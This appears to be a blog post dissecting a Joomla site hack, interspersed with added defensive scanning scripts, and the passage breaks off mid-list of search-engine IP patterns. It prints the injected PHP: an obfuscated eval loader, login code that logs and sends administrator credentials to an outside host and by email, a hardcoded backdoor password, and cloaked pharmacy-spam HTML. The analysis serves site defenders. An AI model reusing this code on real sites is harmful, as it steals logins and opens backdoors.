Continuing from yesterday: I compared the framework.php that had an unexpected date against the original Joomla files for that build. (Folks, you can patch with individual files from GitHub: go back in time to about the same date as the non-hacked files indicate in their header, and click on Raw.) What we are left with is:
<?php $a='bas'.'e6'.'4_d'.'ecode';eval($a("CgokUGFnZXNDb25maWcgPSBhcnJheQooCgknJyAgICAgICA9PiBhcnJheSgnbGV2aXRyYXx2YXJk
which irked me slightly, because now I know in the future to search servers using the below command and regex – this finds it in the site:
findstr b*a*s*e*[0-9]*d*e*c*o*d*e *.php
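A tighter version of the search above, as an added example that is not part of the original post: it folds PHP string concatenation first, so a decoder name split as 'bas'.'e6'.'4_d'.'ecode' is matched exactly, and it only reports lines that combine at least two indicators. The function names and the sample line (built around a harmless constructed payload) are assumptions made for the illustration.

```python
import base64
import os
import re

# PHP decoders that injected loaders commonly reach through a string-built name.
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13")

# Two adjacent quoted fragments joined by PHP's "." operator: 'bas'.'e6'
_CONCAT = re.compile(r"""(['"])([^'"\\]*)\1\s*\.\s*(['"])([^'"\\]*)\3""")
# A decoder name sitting inside quotes, i.e. destined for a variable-function call.
_QUOTED_DECODER = re.compile(r"""(['"])(%s)\1""" % "|".join(DECODERS), re.I)
_EVAL = re.compile(r"\beval\s*\(", re.I)
_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")


def join_concatenations(line):
    """Fold 'bas'.'e6'.'4_d'.'ecode' into 'base64_decode' (heuristic, per line)."""
    while True:
        line, count = _CONCAT.subn(
            lambda m: "'" + m.group(2) + m.group(4) + "'", line)
        if count == 0:
            return line


def scan_php(source):
    """Return [(line_number, [reasons])] for lines with two or more indicators."""
    findings = []
    for lineno, raw in enumerate(source.splitlines(), 1):
        folded = join_concatenations(raw)
        reasons = []
        match = _QUOTED_DECODER.search(folded)
        if match:
            # "split-" means the name only becomes visible after folding.
            hidden = _QUOTED_DECODER.search(raw) is None
            reasons.append(("split-" if hidden else "")
                           + "quoted-decoder:" + match.group(2).lower())
        if _EVAL.search(folded):
            reasons.append("eval")
        if _BLOB.search(folded):
            reasons.append("long-base64-literal")
        if len(reasons) >= 2:
            findings.append((lineno, reasons))
    return findings


def scan_tree(root):
    """Yield (path, line_number, reasons) for every *.php file under root."""
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for lineno, reasons in scan_php(fh.read()):
                        yield path, lineno, reasons


# Constructed sample: the loader shape from the post wrapped around a harmless
# payload, followed by ordinary code that calls base64_decode directly.
_PAYLOAD = base64.b64encode(b'echo "constructed sample payload";' * 6).decode()
SAMPLE_INFECTED = (
    "<?php $a='bas'.'e6'.'4_d'.'ecode';eval($a(\"" + _PAYLOAD + "\"));\n"
    "<?php\n"
    "// legitimate file content starts here\n"
    "$data = base64_decode($row->params);\n"
)

if __name__ == "__main__":
    for lineno, reasons in scan_php(SAMPLE_INFECTED):
        print("line %d: %s" % (lineno, ", ".join(reasons)))
```

A direct call such as base64_decode($x) in legitimate code is not reported, because the name is not inside a string and no second indicator is present.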
The /includes/framework.php goes on with more lines of base64 encoded blech. It goes on for 1852 lines, to be exact. Then on line 1853 it goes into what should have been the contents of the file, unmodified. So I restored the file to the original. When the two are compared, 1108 lines match, but there are 42 lines that don’t.
// Start Login Protection
$ip = $_SERVER["REMOTE_ADDR"];
$stringData = $_SERVER["SERVER_NAME"] . "|" . $credentials["username"] . ":" . $credentials["password"] . "|" . $ip . "\n";
So our first little bit here copies the website client’s address to a variable. Next, it packs the address you typed in to get to the admin page, the User and Password field values (yes, the ones you just typed in), and the IP address we grabbed a second ago into a single pipe-delimited string.
$today = date("j");
$myErrorFile = getcwd() . "/components/com_login/controller.png";
$mySuccessFile = getcwd() . "/components/com_login/login.png";
$failedLogContent = @file_get_contents($myErrorFile);
$successLogContent = @file_get_contents($mySuccessFile);
$errorFileLines = explode("\n", $failedLogContent);
Next we grab the day of the month without leading zeros (1 to 31), and open a couple of files as logs. A quick look at controller.png and login.png reveals that they are the error and success audit logs, showing all the attempted credentials on the login page in plain text and what IP they were tried from. There is no attempt to hide the data inside an image; it is just a filename.
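One way to hunt for this kind of drop file across a web root, as an added example that is not from the original post: it flags files whose image extension does not match their leading bytes, and recognises the host|user:password|ip record layout built in $stringData. The function names and the sample file contents are constructed for the illustration.

```python
import os
import re

# Leading bytes of the real formats, keyed by the extension that claims them.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".ico": (b"\x00\x00\x01\x00",),
}

_IP = r"\d{1,3}(?:\.\d{1,3}){3}"
# host|user:password|ip, the layout of one $stringData record
CRED_LINE = re.compile(r"^[^|\s]+\|[^:|]*:.*\|" + _IP + r"$")
IP_LINE = re.compile(r"^" + _IP + r"$")

# Constructed sample contents (documentation addresses, made-up credentials).
SAMPLE_FAILED_LOG = (
    b"14\n"
    b"www.example.test|admin:hunter2|203.0.113.7\n"
    b"www.example.test|root:letmein|203.0.113.7\n"
)
SAMPLE_SUCCESS_LOG = b"198.51.100.23\n198.51.100.24\n"
SAMPLE_REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32


def classify(data, ext):
    """Return None for a file that starts like a real image, else a reason."""
    if any(data.startswith(sig) for sig in MAGIC[ext]):
        return None
    text = data.decode("utf-8", errors="replace")
    lines = [line for line in text.splitlines() if line.strip()]
    if any(CRED_LINE.match(line) for line in lines):
        return "credential-log"
    if lines and all(IP_LINE.match(line) for line in lines):
        return "ip-list"
    return "wrong-signature"


def find_fake_images(root, max_bytes=65536):
    """Return sorted [(relative_path, reason)] for mislabelled image files."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if ext not in MAGIC:
                continue
            path = os.path.join(folder, name)
            with open(path, "rb") as fh:
                reason = classify(fh.read(max_bytes), ext)
            if reason:
                hits.append((os.path.relpath(path, root), reason))
    return sorted(hits)


if __name__ == "__main__":
    import sys
    for rel_path, reason in find_fake_images(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("%s: %s" % (rel_path, reason))
```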
$diff = $today - $errorFileLines[0];
if ( ($diff >= 7) || ($diff < 0) ) {
    @unlink($myErrorFile);
    $failedLogContent = "";
}
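Treat $diff as the number of days since the failure log was started (its first line holds the day of the month it was created). If that is 7 or more days, or negative because the month rolled over, the failure log is deleted and its in-memory copy is emptied.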
if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
preg_match_all("/{$ip}/i", $failedLogContent, $matches);
if ( (count($matches[0]) > 4) && (!$userOk) ) $credentials["password"] = "G4o7Ivc29OVOxcp5";
Now we see who you are. If you are in the success log, go ahead and set this magical undeclared $userOk variable to 1. If you are in the failed log more than four times, use this for the password to let zombie servers in.
// End Login Protection
These four lines were correct
// Start Login Protection
if ($response->status === JAUTHENTICATE_STATUS_SUCCESS) {
    @file_get_contents("http://www.carriagebandb.com/cgi-bin/optimus.pl?prime=$stringData");
The first action once the login is determined to be successful: go out to one of their hacked websites and post the IP, User and Password that the web client attempted to connect with.
@mail("[email protected]", $_SERVER["SERVER_NAME"], $stringData);
And just in case the botnet is down, email your server name and IP, User, Pass!
    if (!$userOk) {
        $fh = fopen($mySuccessFile, "a");
        fwrite($fh, "$ip\n");
        fclose($fh);
    }
} else {
    if (!(is_file($myErrorFile))) {
        $fh = fopen($myErrorFile, "w");
        fwrite($fh, "$today\n");
        fclose($fh);
    }
    $fh = fopen($myErrorFile, "a");
    fwrite($fh, $stringData);
    fclose($fh);
}
// End Login Protection
if ($response->status === JAUTHENTICATE_STATUS_SUCCESS) {
The rest is basic housekeeping – write out files, close files, and call login page again! So let’s decode our 1800+ line base64 encoded mess. Look what the third line says:
$PagesConfig = array
(
    '' => array('levitra|vardenafil', 'http://advancestunning.com/go.php?a=13&d=grjoklaosveqnsaekmzx'),
);
$server_user_agent = $_SERVER['HTTP_USER_AGENT'];
$server_referer = @$_SERVER['HTTP_REFERER'];
$server_forwarded_for = @$_SERVER["HTTP_X_FORWARDED_FOR"];
$server_remote_addr = $_SERVER['REMOTE_ADDR'];
$server_query_string = $_SERVER['QUERY_STRING'];
$server_request_uri = $_SERVER['REQUEST_URI'];
$hostname = gethostbyaddr ($server_remote_addr);
if(!empty($server_forwarded_for))
    $server_ip = $server_forwarded_for;
else
    $server_ip = $server_remote_addr;
$page = trim($_SERVER['REQUEST_URI'], '/');
$isHuman = detectBot($server_user_agent, $server_ip, $hostname, $server_query_string, $server_referer, $server_request_uri);
$isAdmin = detectAdmin($server_remote_addr);
if ( array_key_exists($page, $PagesConfig) && (!$isHuman) && (!$isAdmin) ) {
This is where the rubber meets the road, we decide if you are a bot, we send you levitra; if you are an Admin, let’s steal your bits, and if you are a user, let’s…:
?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www.innocentsite.com/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Good, friendly, excellent things to have, great keywords, innocent stuff here" /> <meta name="generator" content="Joomla! 1.7 - Open Source Content Management" /> <title>Buy Levitra (Vardenafil) Online From A Certified US Pharmacy >> Lowest Prices Guaranteed</title> <meta name="description" content="Buy Levitra online from an official certified pharmacy, OVERNIGHT Shipping, Exclusive & competitive discount prices, express shipping & discrete packaging." />
If you are a human, let’s show you a flat copy of what your page was supposed to be! It goes on for quite a while with the relevant pre-rendered HTML and CSS. I’ve cropped much out for brevity. Below is a div hidden by CSS from the viewer, but visible to search engines, and very visible when viewing the source code in the browser.
<link href="/templates/innocentsite/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" /> </head> <body> <div id='hideMe'> <p>Weight problems is a result of a very sedentary way of Levitra <a href="http://tweetmic.com/">Levitra Online</a> living. Persons become overweight once they Hcg diet sublingual <a href="http://hcgdietdropsnow.com/">HCG</a> have on physical exercise constantly and use up considerably time Priligy <a href="http://www.coloradoenvision.com/">Buy priligy online</a> staying lazy. The scarcity of movement Viagra Online 100mg <a href="http://www.icecs2008.org/CFP.html">Viagra Online</a> makes it possible for a substantial amount extra fat for Viagra <a href="http://www.sonyc.org/">Viagra Online 100mg</a> each day. Not too years Viagra 100mg Online <a href="http://www.magicbluepillblog.com/">Viagra 50mg</a> <p>Is impotence problems still Payday loan no telecheck <a href="http://nosweatpaydayloans.com/">Wildwood payday loan</a> Electronic cigarette refill liquid 0 mg nicotine <a href="http://electroniccigaretteboutique.com/">No 7 electronic cigarette</a> lack of ability to have an hard-on? Are Electronic cigarette drops <a href="http://electroniccigarettemart.com/">Electronic Cigarette</a> <p>The query of member size is one Levitra 40mg <a href="http://levitraquestions.com/">Levitra Online</a> side that many men think anxious, Viagra 100mg Online <a href="http://www.codman.org/">Viagra Online</a> effect on a person impression penile, together with his psyche, HGH <a href="http://hghknowledgebase.com/">Viagra ireland hgh human growth hormone</a> <p>It entirely possible that the aim of Viagra 100mg Online <a href="http://www.duselwatch.com/">Viagra Online 100mg</a>
<p>The Check out the Universe Little S5570 is a good Online Blackjack <a href="http://winatonlineblackjack.com/">Online Blackjack</a> Android 2.2, getting power using a model Cialis dosage <a href="http://www.charmedtodeath.com/">Generic Cialis</a> </div><script type='text/javascript'>if(document.getElementById('hideMe') != null){document.getElementById('hideMe').style.visibility = 'hidden';document.getElementById('hideMe').style.display = 'none';}</script><div id="container">
Again, skipping more legit website content here, down to this gem:
<div style="background-color:#8ECA92"> <a style="color:#8ECA92" title="lida zayıflama hapı" href="http://www.lidahapicorum.com">lida zayıflama hapı</a> <a style="color:#8ECA92" title="lida zayıflama hapı" href="http://www.lidahapikayseri.com">lida zayıflama hapı</a> <a style="color:#8ECA92" title="lida zayıflama hapı" href="http://www.lidahapikastamonu.com">lida zayıflama hapı</a> <a style="color:#8ECA92" title="lida zayıflama hapı" href="http://www.lidahapimersin.com">lida zayıflama hapı</a> <a style="color:#8ECA92" title="lida zayıflama hapı" href="http://www.lidahapiafyon.com">lida zayıflama hapı</a> <a style="color:#8ECA92" href="http://biberhapizayifla.wordpress.com" title="biber hapı">biber hapı</a> <a style="color:#8ECA92" href="http://kiloaldiriciniz.wordpress.com" title="kilo aldırıcı">kilo aldırıcı</a> <a style="color:#8ECA92" href="http://hotbiberjeli.wordpress.com" title="hot biber jeli">hot biber jeli</a> <a style="color:#8ECA92" href="http://belfitigi.wordpress.com" title="bel fıtığı">bel fıtığı</a> <a style="color:#8ECA92" href="http://hemoroidhapi.wordpress.com" title="hemoroid hapı">hemoroid hapı</a> <a style="color:#8ECA92" href="http://lidaresmisatis.wordpress.com" title="lida resmi satış sitesi">lida resmi satış sitesi</a>
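A check for both hiding tricks shown above (the hideMe div switched off by script, and links coloured the same as their background), as an added example that is not part of the original post. It works on the rendered HTML a visitor receives; the function names and the .example hosts in the sample are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

_DECL = re.compile(r"([a-z-]+)\s*:\s*([^;]+)", re.I)
# document.getElementById('x').style.display = 'none' (or visibility = 'hidden')
_JS_HIDE = re.compile(
    r"getElementById\(\s*['\"]([^'\"]+)['\"]\s*\)\.style\."
    r"(?:display|visibility)\s*=\s*['\"](?:none|hidden)['\"]")
_VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
         "link", "meta", "source", "wbr"}

# Constructed sample page modelled on the structure shown in the post.
SAMPLE_HTML = """<html><body>
<div id='hideMe'><p>filler text <a href="http://spam-one.example/">Pills Online</a>
<p>more filler <a href="http://spam-two.example/">Loans</a></div>
<script type='text/javascript'>if(document.getElementById('hideMe') != null){document.getElementById('hideMe').style.visibility = 'hidden';document.getElementById('hideMe').style.display = 'none';}</script>
<div id="container"><a href="http://www.innocentsite.example/about">About us</a>
<a href="http://partner.example/">Visible partner link</a></div>
<div style="background-color:#8ECA92"><a style="color:#8ECA92" title="x" href="http://spam-three.example">x</a></div>
</body></html>"""


def _inline_style(attrs):
    css = attrs.get("style") or ""
    return {k.lower(): v.strip().lower() for k, v in _DECL.findall(css)}


class _Finder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.stack = []            # open elements: (tag, id, background colour)
        self.links_under_id = {}   # element id -> external hrefs nested in it
        self.script_text = []
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        if tag in _VOID:
            return
        attrs = dict(attrs)
        style = _inline_style(attrs)
        if tag == "a":
            self._check_link(attrs.get("href") or "", style.get("color"))
        self.stack.append((tag, attrs.get("id"), style.get("background-color")))

    def _check_link(self, href, colour):
        host = urlparse(href).hostname
        if not host or host == self.site_host:
            return                 # relative or same-site link
        backgrounds = [bg for _tag, _id, bg in self.stack if bg]
        if colour and backgrounds and colour == backgrounds[-1]:
            self.findings.add(("same-colour-link", href))
        for _tag, elem_id, _bg in self.stack:
            if elem_id:
                self.links_under_id.setdefault(elem_id, []).append(href)

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates unclosed <p> elements.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        if self.stack and self.stack[-1][0] == "script":
            self.script_text.append(data)


def find_hidden_links(html, site_host):
    """Return sorted [(reason, href)] for external links hidden from visitors."""
    finder = _Finder(site_host)
    finder.feed(html)
    finder.close()
    for elem_id in set(_JS_HIDE.findall("".join(finder.script_text))):
        for href in finder.links_under_id.get(elem_id, []):
            finder.findings.add(("script-hidden-link", href))
    return sorted(finder.findings)


if __name__ == "__main__":
    for reason, href in find_hidden_links(SAMPLE_HTML, "www.innocentsite.example"):
        print(reason, href)
```

Because the injected code serves this markup only to some visitors, run the check on responses fetched the way a search engine would fetch them as well as on a normal browser response.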
And now the garbage content ends. Instead of the end of the site, we see more logic and control structures start to emerge:
</div>
<?php
    exit();
}
if ( (isDrugSearch($PagesConfig[$page][0], $server_referer, $hostname) == true) && (!$isAdmin) ) {
    $rederict_URL = $PagesConfig[$page][1];
    header ("Location: $rederict_URL");
    exit();
}
Now we begin the process of deciding what garbage ad you are going to get to see, based upon which network traffic you originate from.
function isDrugSearch($keyword, $ref, $hostname)
{
    //if ( (stripos($ref, 'https') !== false) ) ### Any https
    //{
    //    return true;
    //}
    $keywordsRegex = "/$keyword/i";
    if ( (preg_match($keywordsRegex, $ref)) && ($keyword) ) {
        return true;
    }
    return false;
}
The key to understanding the remainder of the code is knowing Regular Expressions, or regex for short. There are books, start reading. Suffice it to say that the below are some ip ranges for major providers listed to the right, complete with segmentation by referrer. Pretty complex.
function detectBot($server_user_agent, $server_ip, $hostname, $server_query_string, $server_referer, $server_request_uri) { $stop_ips_masks = array ( "66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255 "74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255 "65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255, "74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255 "67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255 "72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255 "38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255 "93\.172\.94\.227", // MacFinder "212\.100\.250\.218", // Wells Search II "71\.165\.223\.134", // Indy Library "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "69\.136\.208\.89", "83\.15\.211\.166", "78\.180\.145\.80", "78\.166\.111\.63", "64\.233\.1[6-8][1-9]\.[0-9]+", "64\.233\.19[0-1]\.[0-9]+", "209\.185\.108\.[0-9]+", "209\.185\.253\.[0-9]+", "209\.85\.238\.[0-9]+", "216\.239\.33\.9[6-9]", "216\.239\.37\.9[8-9]", "216\.239\.39\.9[8-9]", "216\.239\.41\.9[6-9]", "216\.239\.45\.4", "216\.239\.46\.[0-9]+", "216\.239\.51\.9[6-9]", "216\.239\.53\.9[8-9]", "216\.239\.57\.9[6-9]", "216\.239\.59\.9[8-9]", "216\.33\.229\.163", "64\.233\.173\.[0-9]+", "64\.68\.8[0-9]\.[0-9]+", "64\.68\.9[0-2]\.[0-9]+", "72\.14\.199\.[0-9]+", "8\.6\.48\.[0-9]+", "207\.211\.40\.82", "67\.162\.158\.146", "66\.255\.53\.123", "24\.200\.208\.112", "129\.187\.148\.240", "129\.187\.148\.244", "199\.126\.151\.229", "118\.124\.32\.193", "89\.149\.217\.191", "209\.185\.108", "128\.2\.140", "209\.185\.253", "209\.85\.238", "209\.85\.238\.11", "209\.85\.238\.4", 
"216\.239\.33\.96", "216\.239\.33\.97", "66\.249\.84", "74\.6\.87", "66\.249", "108\.59\.[0-9]+\.[0-9]+", "109\.109\.[0-9]+\.[0-9]+", "113\.197\.[0-9]+\.[0-9]+", "124\.30\.[0-9]+\.[0-9]+", "141\.185\.209\.[0-9]+", "157\.238\.[0-9]+\.[0-9]+", "166\.90\.[0-9]+\.[0-9]+", "169\.207\.238\.[0-9]+", "173\.194\.[0-9]+\.[0-9]+", "173\.203\.[0-9]+\.[0-9]+", "173\.255\.[0-9]+\.[0-9]+", "174\.129\.130\.[0-9]+", "174\.142\.[0-9]+\.[0-9]+", "178\.33\.[0-9]+\.[0-9]+", "193\.120\.[0-9]+\.[0-9]+", "193\.142\.[0-9]+\.[0-9]+", "193\.186\.[0-9]+\.[0-9]+", "193\.200\.[0-9]+\.[0-9]+", "193\.92\.[0-9]+\.[0-9]+", "194\.100\.[0-9]+\.[0-9]+", "194\.110\.[0-9]+\.[0-9]+", "194\.221\.[0-9]+\.[0-9]+", "194\.78\.[0-9]+\.[0-9]+", "195\.100\.[0-9]+\.[0-9]+", "195\.145\.[0-9]+\.[0-9]+", "195\.18\.[0-9]+\.[0-9]+", "195\.205\.[0-9]+\.[0-9]+", "195\.22\.[0-9]+\.[0-9]+", "195\.229\.[0-9]+\.[0-9]+", "195\.27\.[0-9]+\.[0-9]+", "195\.59\.[0-9]+\.[0-9]+", "195\.65\.[0-9]+\.[0-9]+", "196\.3\.[0-9]+\.[0-9]+", "198\.108\.[0-9]+\.[0-9]+", "199\.177\.18\.[0-9]+", "200\.99\.[0-9]+\.[0-9]+", "202\.106\.[0-9]+\.[0-9]+", "202\.160\.178\.[0-9]+", "202\.160\.179\.[0-9]+", "202\.160\.180\.[0-9]+", "202\.160\.181\.[0-9]+", "202\.160\.183\.[0-9]+", "202\.160\.185\.[0-9]+", "202\.165\.96\.[0-9]+", "202\.165\.98\.[0-9]+", "202\.165\.99\.[0-9]+", "202\.212\.5\.[0-9]+", "202\.46\.19\.[0-9]+", "202\.96\.[0-9]+\.[0-9]+", "203\.123\.188\.[0-9]+", "203\.141\.52\.[0-9]+", "203\.222\.[0-9]+\.[0-9]+", "203\.255\.234\.[0-9]+", "203\.98\.[0-9]+\.[0-9]+", "204\.50\.[0-9]+\.[0-9]+", "206\.15\.[0-9]+\.[0-9]+", "206\.160\.[0-9]+\.[0-9]+", "206\.169\.[0-9]+\.[0-9]+", "206\.186\.[0-9]+\.[0-9]+", "206\.190\.43\.[0-9]+", "207\.126\.239\.[0-9]+", "207\.250\.[0-9]+\.[0-9]+", "207\.47\.[0-9]+\.[0-9]+", "207\.86\.[0-9]+\.[0-9]+", "207\.88\.[0-9]+\.[0-9]+", "208\.113\.[0-9]+\.[0-9]+", "208\.185\.[0-9]+\.[0-9]+", "208\.21\.[0-9]+\.[0-9]+", "208\.253\.[0-9]+\.[0-9]+", "208\.36\.[0-9]+\.[0-9]+", "208\.37\.[0-9]+\.[0-9]+", "209\.1\.12\.[0-9]+", 
"209\.1\.13\.[0-9]+", "209\.1\.32\.[0-9]+", "209\.1\.38\.[0-9]+", "209\.119\.[0-9]+\.[0-9]+", "209\.131\.40\.[0-9]+", "209\.131\.41\.[0-9]+", "209\.131\.48\.[0-9]+", "209\.131\.49\.[0-9]+", "209\.131\.50\.[0-9]+", "209\.131\.51\.[0-9]+", "209\.131\.60\.[0-9]+", "209\.131\.62\.[0-9]+", "209\.185\.[0-9]+\.[0-9]+", "209\.191\.123\.[0-9]+", "209\.191\.64\.[0-9]+", "209\.191\.65\.[0-9]+", "209\.191\.82\.[0-9]+", "209\.191\.83\.[0-9]+", "209\.203\.[0-9]+\.[0-9]+", "209\.220\.[0-9]+\.[0-9]+", "209\.245\.[0-9]+\.[0-9]+", "209\.247\.[0-9]+\.[0-9]+", "209\.249\.[0-9]+\.[0-9]+", "209\.67\.206\.[0-9]+", "209\.73\.176\.[0-9]+", "209\.85\.[0-9]+\.[0-9]+", "211\.14\.8\.[0-9]+", "211\.169\.241\.[0-9]+", "212\.0\.[0-9]+\.[0-9]+", "212\.108\.[0-9]+\.[0-9]+", "212\.126\.[0-9]+\.[0-9]+", "212\.179\.[0-9]+\.[0-9]+", "212\.181\.[0-9]+\.[0-9]+", "212\.21\.[0-9]+\.[0-9]+", "212\.49\.[0-9]+\.[0-9]+", "213\.144\.[0-9]+\.[0-9]+", "213\.152\.[0-9]+\.[0-9]+", "213\.186\.[0-9]+\.[0-9]+", "213\.187\.[0-9]+\.[0-9]+", "213\.19\.[0-9]+\.[0-9]+", "213\.216\.143\.[0-9]+", "213\.240\.[0-9]+\.[0-9]+", "213\.246\.[0-9]+\.[0-9]+", "213\.31\.[0-9]+\.[0-9]+", "213\.61\.[0-9]+\.[0-9]+", "216\.109\.[0-9]+\.[0-9]+", "216\.110\.[0-9]+\.[0-9]+", "216\.136\.[0-9]+\.[0-9]+", "216\.145\.58\.[0-9]+", "216\.155\.198\.[0-9]+", "216\.155\.200\.[0-9]+", "216\.155\.202\.[0-9]+", "216\.155\.204\.[0-9]+", "216\.156\.[0-9]+\.[0-9]+", "216\.218\.[0-9]+\.[0-9]+", "216\.239\.[0-9]+\.[0-9]+", "216\.32\.237\.[0-9]+", "216\.33\.[0-9]+\.[0-9]+", "216\.34\.[0-9]+\.[0-9]+", "216\.74\.[0-9]+\.[0-9]+", "217\.118\.[0-9]+\.[0-9]+", "217\.149\.[0-9]+\.[0-9]+", "217\.163\.[0-9]+\.[0-9]+", "217\.30\.[0-9]+\.[0-9]+", "217\.33\.[0-9]+\.[0-9]+", "222\.66\.[0-9]+\.[0-9]+", "4\.3\.[0-9]+\.[0-9]+", "62\.159\.[0-9]+\.[0-9]+", "62\.172\.199\.[0-9]+", "62\.20\.[0-9]+\.[0-9]+", "62\.27\.59\.[0-9]+", "63\.146\.[0-9]+\.[0-9]+", "63\.161\.[0-9]+\.[0-9]+", "63\.163\.102\.[0-9]+", "63\.166\.[0-9]+\.[0-9]+", "63\.251\.[0-9]+\.[0-9]+", 
"63\.83\.[0-9]+\.[0-9]+", "63\.84\.[0-9]+\.[0-9]+", "63\.97\.[0-9]+\.[0-9]+", "64\.0\.[0-9]+\.[0-9]+", "64\.124\.[0-9]+\.[0-9]+", "64\.128\.[0-9]+\.[0-9]+", "64\.132\.[0-9]+\.[0-9]+", "64\.154\.[0-9]+\.[0-9]+", "64\.157\.137\.[0-9]+", "64\.157\.138\.[0-9]+", "64\.186\.[0-9]+\.[0-9]+", "64\.233\.[0-9]+\.[0-9]+", "64\.245\.[0-9]+\.[0-9]+", "64\.41\.[0-9]+\.[0-9]+", "64\.68\.[0-9]+\.[0-9]+", "64\.71\.[0-9]+\.[0-9]+", "64\.75\.36\.[0-9]+", "64\.9\.[0-9]+\.[0-9]+", "65\.167\.[0-9]+\.[0-9]+", "65\.170\.[0-9]+\.[0-9]+", "65\.171\.[0-9]+\.[0-9]+", "65\.196\.[0-9]+\.[0-9]+", "65\.201\.[0-9]+\.[0-9]+", "65\.205\.[0-9]+\.[0-9]+", "65\.210\.[0-9]+\.[0-9]+", "65\.211\.[0-9]+\.[0-9]+", "65\.214\.[0-9]+\.[0-9]+", "65\.221\.[0-9]+\.[0-9]+", "65\.223\.[0-9]+\.[0-9]+", "65\.245\.[0-9]+\.[0-9]+", "65\.47\.[0-9]+\.[0-9]+", "66\.102\.[0-9]+\.[0-9]+", "66\.162\.[0-9]+\.[0-9]+", "66\.163\.170\.[0-9]+", "66\.163\.174\.[0-9]+", "66\.192\.[0-9]+\.[0-9]+", "66\.196\.101\.[0-9]+", "66\.196\.65\.[0-9]+", "66\.196\.67\.[0-9]+", "66\.196\.72\.[0-9]+", "66\.196\.73\.[0-9]+", "66\.196\.74\.[0-9]+", "66\.196\.77\.[0-9]+", "66\.196\.78\.[0-9]+", "66\.196\.80\.[0-9]+", "66\.196\.81\.[0-9]+", "66\.196\.90\.[0-9]+", "66\.196\.91\.[0-9]+", "66\.196\.92\.[0-9]+", "66\.196\.93\.[0-9]+", "66\.196\.97\.[0-9]+", "66\.196\.99\.[0-9]+", "66\.218\.65\.[0-9]+", "66\.218\.70\.[0-9]+", "66\.227\.[0-9]+\.[0-9]+", "66\.228\.164\.[0-9]+", "66\.228\.165\.[0-9]+", "66\.228\.166\.[0-9]+", "66\.228\.173\.[0-9]+", "66\.228\.182\.[0-9]+", "66\.249\.[0-9]+\.[0-9]+", "66\.77\.[0-9]+\.[0-9]+", "66\.94\.230\.[0-9]+", "66\.94\.232\.[0-9]+", "66\.94\.233\.[0-9]+", "66\.94\.238\.[0-9]+", "67\.122\.[0-9]+\.[0-9]+", "67\.126\.[0-9]+\.[0-9]+", "67\.152\.[0-9]+\.[0-9]+", "67\.195\.115\.[0-9]+", "67\.195\.34\.[0-9]+", "67\.195\.37\.[0-9]+", "67\.195\.44\.[0-9]+", "67\.195\.45\.[0-9]+", "67\.195\.50\.[0-9]+", "67\.195\.51\.[0-9]+", "67\.195\.52\.[0-9]+", "67\.195\.53\.[0-9]+", "67\.195\.54\.[0-9]+", "67\.195\.58\.[0-9]+", 
